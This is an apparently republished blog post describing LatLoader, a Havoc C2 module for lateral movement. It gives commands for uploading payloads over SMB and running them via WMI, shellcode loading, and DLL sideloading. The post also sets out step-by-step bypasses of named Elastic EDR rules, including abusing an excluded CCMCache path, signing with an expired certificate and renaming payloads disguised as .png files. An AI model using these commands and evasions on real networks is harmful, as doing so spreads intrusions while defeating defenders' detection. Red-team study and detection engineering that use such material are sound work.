{"id":30826,"date":"2023-10-13T11:31:06","date_gmt":"2023-10-13T11:31:06","guid":{"rendered":"https:\/\/kalilinuxtutorials.com\/?p=30826"},"modified":"2023-10-13T11:31:09","modified_gmt":"2023-10-13T11:31:09","slug":"latloader","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/latloader\/","title":{"rendered":"LatLoader &#8211; Evading Elastic EDR In Lateral Movement"},"content":{"rendered":"\n<p>LatLoader is a PoC module to demonstrate automated lateral movement with the Havoc C2 framework. The main purpose of this project is to help others learn BOF and Havoc module development. <\/p>\n\n\n\n<p>This project can also help others understand basic EDR rule evasions, particularly when performing lateral movement. The&nbsp;<code>sideload<\/code>&nbsp;subcommand is the full-featured PoC of this module. <\/p>\n\n\n\n<p>It will attempt to perform lateral movement via DLL sideloading while evading default Elastic EDR rules. <\/p>\n\n\n\n<p>For a full list of every rule evaded by this module and how it was done, please see the below section titled&nbsp;<a href=\"https:\/\/github.com\/icyguider\/LatLoader#elastic-edr-rule-evasions\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Elastic EDR Rule Evasions<\/a>.<\/p>\n\n\n\n<p><a href=\"https:\/\/youtu.be\/W0PZZPpsO6U\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Video demo w\/ Elastic EDR<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"user-content-dependenciesbasic-usage\"><strong><a href=\"https:\/\/github.com\/icyguider\/LatLoader#dependenciesbasic-usage\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Dependencies\/Basic Usage<\/a><\/strong><\/h2>\n\n\n\n<p>This module was designed to work on Linux systems with&nbsp;<code>mingw-w64<\/code>&nbsp;installed. 
Additionally, you must have&nbsp;<a href=\"https:\/\/github.com\/mtrojnar\/osslsigncode\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">osslsigncode<\/a>&nbsp;installed to provide cert signing for the DLL utilized by the&nbsp;<code>sideload<\/code>&nbsp;subcommand. <\/p>\n\n\n\n<p>Once all dependencies are installed, simply type&nbsp;<code>make<\/code>&nbsp;and then load the module into Havoc using the script manager. To view help in Havoc, run&nbsp;<code>help LatLoader<\/code>. <\/p>\n\n\n\n<p>To view help for subcommands, run&nbsp;<code>help [subcommand]<\/code>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"user-content-usagesubcommands\"><strong><a href=\"https:\/\/github.com\/icyguider\/LatLoader#usagesubcommands\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Usage\/Subcommands<\/a><\/strong><\/h2>\n\n\n\n<p>The LatLoader module contains 5 different subcommands. The first two,&nbsp;<code>rupload<\/code>&nbsp;and&nbsp;<code>exec<\/code>, serve as the main mechanism for executing the provided BOFs. 
<\/p>\n\n\n\n<p>The 3 other subcommands (<code>load<\/code>,&nbsp;<code>xorload<\/code>, &amp;&nbsp;<code>sideload<\/code>) combine the previous two in order to perform automated lateral movement.<\/p>\n\n\n\n<p>The&nbsp;<code>rupload<\/code>&nbsp;command can be used to upload a local file to a remote system via SMB using the&nbsp;<code>writefileBOF.c<\/code>&nbsp;BOF like so:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>LatLoader rupload dc1 \/root\/demon.x64.exe C:\\Windows\\Temp\\test.exe<\/code><\/pre>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi9r4JL4FS-bZJsm9MLvEKYwemiPV6xP2iQ2IeXXvxYL5JwlsOWkM8GeeKD1SjEvjDVOIMKj1oWJVofJrcrOzutnCEJ4nUKG4WnT7sEVQ9PyvgyNdlLW_tu3PHqh5-Ic1L_V3sF8zPIgE7a_r5H4zSiDBqO7yg-trwIHkNV499yDs-_TFQGWbC-81QnTq0B\/s16000\/273250781-9f5b6315-7414-4c09-a5e1-68900ad58f4a%20(1).webp\" alt=\"\"\/><\/figure>\n<\/div>\n\n\n<p>The&nbsp;<code>exec<\/code>&nbsp;subcommand can be used to execute a command on a remote system via WMI using the&nbsp;<code>wmiBOF.cpp<\/code>&nbsp;BOF like so:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>LatLoader exec dc1 \"cmd.exe \/c whoami &gt; C:\\poc.txt\"<\/code><\/pre>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhEbevIIzWCXJIvah_p7zqX6bK-J6Lr_RnroiplS9V4CDaDBihGmVql-a4zKzi2E5y8unTLJgbfQkQRQqDOBVFLfVODY1j9kOfzYTWc3W6YytlyuD4mc87oNDYs8gu5IShoiVYBRkQp1Pjmwp7ClR1deF1UDmBeWS1HvG0Aw2QysC-L9OQAxUF5VlBnvWvK\/s16000\/273251100-90d569fc-ee15-4ed4-9ad5-d984454ea597.webp\" alt=\"\"\/><\/figure>\n<\/div>\n\n\n<p>The&nbsp;<code>load<\/code>&nbsp;subcommand combines the two subcommands above to transfer a specified exe to the remote host via SMB and execute it over WMI:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>LatLoader load dc1 
\/root\/test.exe<\/code><\/pre>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjHRk4r23wtXm0Rwi_bVZvDBNh2fQ5zt3Ebm4e0l4WA7NK46KXvJAxzne9Adre2SRFfAHm8LoZR4vI1aXQHKuxWBgJ7sU3BoZxfLdZxPUtDek3flscE6_nKwGstAim6aARpkXdyEQV7rm1ghzP7Olsmmm2UV_2k8CBu7dV481Zvme3ZgGYToK27we1wp5cN\/s16000\/273251183-ea475419-ca1a-4786-b40c-6716638e1e5b.webp\" alt=\"\"\/><\/figure>\n<\/div>\n\n\n<p>The&nbsp;<code>xorload<\/code>&nbsp;subcommand will perform lateral movement using a simple shellcode loader. This is designed to bypass basic AV detections:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>LatLoader xorload dc1 \/root\/demon.x64.bin<\/code><\/pre>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh_xDi8naHzY9hVcGdaGnDr-UIc3Jq7xmfNhYjv0bH4feyVXHS-cXCYqlHnT70h7dz-tAQK8-fbhFrRztu7I26MpcR9HkvYyWO-vhRRTXM-t8Dcm5Cy0X0F5hrHHdQDH-I3sogUUtq7KsaAksw6aYg9I-RfHVWyltsAYNACSwRb0U8ohKkqgKultYqeN3LC\/s16000\/273251264-384c9c70-aeeb-4b5d-a261-3a5724468009.webp\" alt=\"\"\/><\/figure>\n<\/div>\n\n\n<p>Finally, the&nbsp;<code>sideload<\/code>&nbsp;subcommand will perform lateral movement by DLL sideloading a simple shellcode loader. 
Actions were also taken to evade various Elastic EDR rules.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>LatLoader sideload dc1 \/root\/demon.x64.bin<\/code><\/pre>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh1DvwOrpL7FNukCb2mIk5-Q-HTRBRhJdkY5Z9J6MD95UYIzO81uAu86UCpyRV6hRP1aSNr7027-QwqMy6gW7jcG9JapOVF8FsPxrzKZGSZgAs_5BAEofdXz04KWHkn6dcs9lxQH4LI3q12QsCZc1ggzbtRZZLoCVd9gHOy3tWaZeC3gkeskBlz1GbLpaBA\/s16000\/273251373-8af2aa2e-7ddb-496d-8b34-dc67860b38c8.webp\" alt=\"\"\/><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading\" id=\"user-content-elastic-edr-rule-evasions\"><strong><a href=\"https:\/\/github.com\/icyguider\/LatLoader#elastic-edr-rule-evasions\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Elastic EDR Rule Evasions<\/a><\/strong><\/h2>\n\n\n\n<p>The following is a list of various Elastic EDR rules that could alert when performing lateral movement. I have provided what steps were taken to evade each rule. <\/p>\n\n\n\n<p>All evasions described here were implemented in the&nbsp;<code>sideload<\/code>&nbsp;subcommand to demonstrate how they can be combined to create a fully functional PoC.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"user-content-remote-execution-via-file-shares\"><a href=\"https:\/\/github.com\/icyguider\/LatLoader#remote-execution-via-file-shares\"><\/a><a href=\"https:\/\/www.elastic.co\/guide\/en\/security\/current\/remote-execution-via-file-shares.html\" target=\"_blank\" rel=\"noreferrer noopener nofollow\"><strong>Remote Execution via File Shares<\/strong><\/a><\/h2>\n\n\n\n<p><strong>Description:<\/strong>&nbsp;Identifies the execution of a file that was created by the virtual system process. 
This may indicate lateral movement via network file shares.<\/p>\n\n\n\n<p><strong>Bypass:<\/strong>&nbsp;This rule was bypassed by performing DLL sideloading.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"user-content-malicious-behavior-detection-alert-unsigned-file-execution-via-network-logon\"><a href=\"https:\/\/github.com\/icyguider\/LatLoader#malicious-behavior-detection-alert-unsigned-file-execution-via-network-logon\"><\/a><a href=\"https:\/\/github.com\/elastic\/protections-artifacts\/blob\/main\/behavior\/rules\/lateral_movement_unsigned_file_execution_via_network_logon.toml\" target=\"_blank\" rel=\"noreferrer noopener nofollow\"><strong>Malicious Behavior Detection Alert: Unsigned File Execution via Network Logon<\/strong><\/a><\/h2>\n\n\n\n<p><strong>Description:<\/strong>&nbsp;Identifies the execution of a recently created file that is unsigned or untrusted and from a remote network logon. This may indicate lateral movement via remote services.<\/p>\n\n\n\n<p><strong>Bypass:<\/strong>&nbsp;This rule was bypassed by performing DLL sideloading.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"user-content-malicious-behavior-detection-alert-execution-of-a-file-dropped-from-smb\"><a href=\"https:\/\/github.com\/icyguider\/LatLoader#malicious-behavior-detection-alert-execution-of-a-file-dropped-from-smb\"><\/a><a href=\"https:\/\/github.com\/elastic\/protections-artifacts\/blob\/main\/behavior\/rules\/lateral_movement_execution_of_a_file_dropped_from_smb.toml\" target=\"_blank\" rel=\"noreferrer noopener nofollow\"><strong>Malicious Behavior Detection Alert: Execution of a File Dropped from SMB<\/strong><\/a><\/h2>\n\n\n\n<p><strong>Description:<\/strong>&nbsp;Identifies the execution of a file that was created by the virtual system process and subsequently executed. This may indicate lateral movement via network file shares.<\/p>\n\n\n\n<p><strong>Bypass:<\/strong>&nbsp;This rule was bypassed by executing the transferred file using cmd.exe \/c. 
This evades the rule because the file is not executed directly, but instead by a trusted binary.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"user-content-wmi-incoming-lateral-movement\"><a href=\"https:\/\/github.com\/icyguider\/LatLoader#wmi-incoming-lateral-movement\"><\/a><a href=\"https:\/\/www.elastic.co\/guide\/en\/security\/current\/wmi-incoming-lateral-movement.html\" target=\"_blank\" rel=\"noreferrer noopener nofollow\"><strong>WMI Incoming Lateral Movement<\/strong><\/a><\/h2>\n\n\n\n<p><strong>Description:<\/strong>&nbsp;Identifies processes executed via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement, but could be noisy if administrators use WMI to remotely manage hosts.<\/p>\n\n\n\n<p><strong>Bypass:<\/strong>&nbsp;This rule was bypassed by including a path in our command that the rule excludes. As seen in the query,&nbsp;<code>C:\\\\Windows\\\\CCMCache\\\\*<\/code>&nbsp;is one of these directories, which was appended to each wmi command like so:&nbsp;<code>&amp;&amp; echo --path C:\\\\Windows\\\\CCMCache\\\\cache<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"user-content-malicious-behavior-prevention-alert-dll-side-loading-via-a-copied-microsoft-executable\"><a href=\"https:\/\/github.com\/icyguider\/LatLoader#malicious-behavior-prevention-alert-dll-side-loading-via-a-copied-microsoft-executable\"><\/a><a href=\"https:\/\/github.com\/elastic\/protections-artifacts\/blob\/main\/behavior\/rules\/defense_evasion_dll_side_loading_via_a_copied_microsoft_executable.toml\" target=\"_blank\" rel=\"noreferrer noopener nofollow\"><strong>Malicious Behavior Prevention Alert: DLL Side Loading via a Copied Microsoft Executable<\/strong><\/a><\/h2>\n\n\n\n<p><strong>Description:<\/strong>&nbsp;Identifies when a Microsoft signed binary is copied to a directory and shortly followed by the loading of an unsigned DLL from the same directory. 
<\/p>\n\n\n\n<p>Adversaries may opt for moving Microsoft signed binaries to a random directory and use them as a host for malicious DLL sideloading during the installation phase.<\/p>\n\n\n\n<p><strong>Bypass:<\/strong>&nbsp;This rule was bypassed by signing the DLL sideloader with an expired cert. The expired cert was obtained from <a href=\"https:\/\/github.com\/utoni\/PastDSE\/tree\/main\/certs\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">here<\/a>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"user-content-malicious-behavior-prevention-alert-virtualprotect-api-call-from-an-unsigned-dll\"><a href=\"https:\/\/github.com\/icyguider\/LatLoader#malicious-behavior-prevention-alert-virtualprotect-api-call-from-an-unsigned-dll\"><\/a><a href=\"https:\/\/github.com\/elastic\/protections-artifacts\/blob\/main\/behavior\/rules\/defense_evasion_virtualprotect_api_call_from_an_unsigned_dll.toml\" target=\"_blank\" rel=\"noreferrer noopener nofollow\"><strong>Malicious Behavior Prevention Alert: VirtualProtect API Call from an Unsigned DLL<\/strong><\/a><\/h2>\n\n\n\n<p><strong>Description:<\/strong>&nbsp;Identifies the load of an unsigned or untrusted DLL by a trusted binary followed by calling VirtualProtect API to change memory permission to execute or write. This may indicate execution via DLL sideloading to perform code injection.<\/p>\n\n\n\n<p><strong>Bypass:<\/strong>&nbsp;This rule was bypassed by signing the DLL sideloader with an expired cert. 
The expired cert was obtained from <a href=\"https:\/\/github.com\/utoni\/PastDSE\/tree\/main\/certs\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">here<\/a>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"user-content-potential-lateral-tool-transfer-via-smb-share\"><a href=\"https:\/\/github.com\/icyguider\/LatLoader#potential-lateral-tool-transfer-via-smb-share\"><\/a><a href=\"https:\/\/www.elastic.co\/guide\/en\/security\/current\/potential-lateral-tool-transfer-via-smb-share.html\" target=\"_blank\" rel=\"noreferrer noopener nofollow\"><strong>Potential Lateral Tool Transfer via SMB Share<\/strong><\/a><\/h2>\n\n\n\n<p><strong>Description:<\/strong>&nbsp;Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment.<\/p>\n\n\n\n<p><strong>Bypass:<\/strong>&nbsp;This rule was bypassed by creating the file via SMB with a safe extension like .png, and then making a copy of the file with its real extension via WMI.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"user-content-malicious-behavior-detection-alert-imageload-of-a-file-dropped-via-smb\"><a href=\"https:\/\/github.com\/icyguider\/LatLoader#malicious-behavior-detection-alert-imageload-of-a-file-dropped-via-smb\"><\/a><a href=\"https:\/\/github.com\/elastic\/protections-artifacts\/blob\/main\/behavior\/rules\/lateral_movement_imageload_of_a_file_dropped_via_smb.toml\" target=\"_blank\" rel=\"noreferrer noopener nofollow\"><strong>Malicious Behavior Detection Alert: ImageLoad of a File dropped via SMB<\/strong><\/a><\/h2>\n\n\n\n<p><strong>Description:<\/strong>&nbsp;Identifies the transfer of a library via SMB followed by loading it into commonly used DLL proxy execution binaries such as rundll32, regsvr32 and shared services via svchost.exe. 
This may indicate an attempt to remotely execute malicious code.<\/p>\n\n\n\n<p><strong>Bypass:<\/strong>&nbsp;This rule was bypassed by creating the file via SMB with a safe extension like .png, and then making a copy of the file with its real extension via WMI.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"user-content-standalone-binaries\"><strong><a href=\"https:\/\/github.com\/icyguider\/LatLoader#standalone-binaries\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Standalone Binaries<\/a><\/strong><\/h2>\n\n\n\n<p>I have also provided standalone versions of the BOFs used in this project. These could be useful if you are unfamiliar with BOF development and would like to learn by comparing a normal program to its BOF counterpart.<\/p>\n\n\n\n<p><code>wmiexec.cpp<\/code>&nbsp;is the standalone binary for command execution via WMI. It can be compiled with mingw like so:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>x86_64-w64-mingw32-g++ wmiexec.cpp -I include -l oleaut32 -l ole32 -l wbemuuid -w -static -o \/share\/wmiexec.exe<\/code><\/pre>\n\n\n\n<p>The exe can then be transferred to the target and executed like so, providing arguments via the CLI:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\\wmiexec.exe dc1 'cmd.exe \/c whoami &gt; c:\\test.txt'<\/code><\/pre>\n\n\n\n<p><code>writefile.c<\/code>&nbsp;is the standalone binary for file transfer via SMB. It can be compiled with mingw like so:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>x86_64-w64-mingw32-gcc writefile.c -w -static -o \/share\/writefile.exe<\/code><\/pre>\n\n\n\n<p>The exe can then be transferred to the target and executed like so, providing arguments via the CLI:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\\writefile.exe .\\test.txt \\\\dc1\\C$\\poc.txt<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>LatLoader is a PoC module to demonstrate automated lateral movement with the Havoc C2 framework. 
The main purpose of this project is to help others learn BOF and Havoc module development. This project can also help others understand basic EDR rule evasions, particularly when performing lateral movement. The&nbsp;sideload&nbsp;subcommand is the full-featured PoC of this module. [&hellip;]<\/p>\n","protected":false},"author":12,"featured_media":30844,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[20],"tags":[737,6321,6052,6325,6356],"class_list":["post-30826","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cyber-security","tag-cybersecurity","tag-informationsecurity","tag-kalilinux","tag-kalilinuxtools","tag-latloader"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>LatLoader - Evading Elastic EDR In Lateral Movement<\/title>\n<meta name=\"description\" content=\"LatLoader is a PoC module to demonstrate automated lateral movement with the Havoc C2 framework. 
The main purpose of this project\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/latloader\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"LatLoader - Evading Elastic EDR In Lateral Movement\" \/>\n<meta property=\"og:description\" content=\"LatLoader is a PoC module to demonstrate automated lateral movement with the Havoc C2 framework. The main purpose of this project\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/latloader\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2023-10-13T11:31:06+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-10-13T11:31:09+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp\" \/>\n<meta name=\"author\" content=\"Varshini\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Varshini\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/latloader\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/latloader\/\"},\"author\":{\"name\":\"Varshini\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa\"},\"headline\":\"LatLoader &#8211; Evading Elastic EDR In Lateral Movement\",\"datePublished\":\"2023-10-13T11:31:06+00:00\",\"dateModified\":\"2023-10-13T11:31:09+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/latloader\/\"},\"wordCount\":1065,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/latloader\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp\",\"keywords\":[\"cybersecurity\",\"informationsecurity\",\"kalilinux\",\"kalilinuxtools\",\"LatLoader\"],\"articleSection\":[\"Cyber security\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/latloader\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/latloader\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/latloader\/\",\"name\":\"LatLoader - Evading Elastic EDR In Lateral 
Movement\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/latloader\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/latloader\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp\",\"datePublished\":\"2023-10-13T11:31:06+00:00\",\"dateModified\":\"2023-10-13T11:31:09+00:00\",\"description\":\"LatLoader is a PoC module to demonstrate automated lateral movement with the Havoc C2 framework. The main purpose of this project\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/latloader\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/latloader\/#primaryimage\",\"url\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp\",\"contentUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp\",\"width\":\"1600\",\"height\":\"900\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux 
Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa\",\"name\":\"Varshini\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f19f43637c0f83fb3dcfb498f306b2a9ac0025ce85840ab52ee8c01f5361f269?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f19f43637c0f83fb3dcfb498f306b2a9ac0025ce85840ab52ee8c01f5361f269?s=96&d=mm&r=g\",\"caption\":\"Varshini\"},\"description\":\"Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. 
Passionate about staying ahead of emerging Threats and Technologies.\",\"sameAs\":[\"http:\/\/kalilinuxtutorials.com\",\"https:\/\/www.linkedin.com\/in\/senthamil-selvan-14043a285\/\"],\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/vinayakagrawal\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"LatLoader - Evading Elastic EDR In Lateral Movement","description":"LatLoader is a PoC module to demonstrate automated lateral movement with the Havoc C2 framework. The main purpose of this project","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/latloader\/","og_locale":"en_US","og_type":"article","og_title":"LatLoader - Evading Elastic EDR In Lateral Movement","og_description":"LatLoader is a PoC module to demonstrate automated lateral movement with the Havoc C2 framework. The main purpose of this project","og_url":"https:\/\/kalilinuxtutorials.com\/latloader\/","og_site_name":"Kali Linux 